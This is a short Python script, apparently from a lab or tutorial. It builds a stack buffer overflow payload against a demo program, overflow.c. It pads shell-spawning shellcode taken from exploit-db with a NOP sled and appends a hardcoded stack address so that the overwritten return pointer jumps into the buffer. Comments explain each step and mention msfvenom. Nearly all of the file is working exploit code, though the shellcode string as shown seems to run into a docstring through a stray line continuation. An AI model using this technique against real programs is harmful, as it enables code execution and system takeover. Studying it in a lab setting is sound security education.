"""

exploit.py - generates a payload to exploit overflow.c

tested under Kali Linux, 32-bit executable

"""

import struct

# in x86, this is a machine code instruction that does nothing

NOP = '\x90'

def lpad_nop(s, n):

"""

Pad the string up to length n by appending NOP instructions to the

beginning

"""

return (NOP * (n - len(s))) + s

# the address of the "name" buffer

name_address = 0xffffd600

# convert the address int to its 4-byte representation, little endian

address_bytes = struct.pack('<I', name_address)

# the distance on the stack from the start of the name buffer to

# the stored base pointer

offset = 264

# this machine code should open a shell; we got it from

# https://www.exploit-db.com. you can also play around with generating your own

# shellcode using the msfvenom tool (part of the metasploit framework)

shellcode = "\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x68" \

"\x90\x90\x90\x68\x58\xc1\xe8\x10\xc1" \

"\xe8\x08\x50\x68\x2f\x64\x61\x73\x68" \

"\x2f\x62\x69\x6e\x89\xe3\x31\xc0\xb0" \

"\x0b\xcd\x80\xb0\x01\xb3\x01\xcd\x80" \

"""

The payload consists of the shellcode, padded to <offset> bytes, plus

the address of our buffer, which will overwrite the stored base

pointer and the stored return pointer (it is important that we overwrite

the frame pointer with a valid address so that the program doesn't segfault

when returning). When the stored return pointer is loaded into the program

counter, execution control will jump to the address of the name buffer,

and begin executing our shellcode, hopefully getting us a shell

"""

payload = lpad_nop(shellcode, offset) + address_bytes*2

# write out the payload to a file, so we can input it to the program. i,e:

# "cat payload - | ./overflow"

with open('payload', 'wb') as f:

f.write(payload)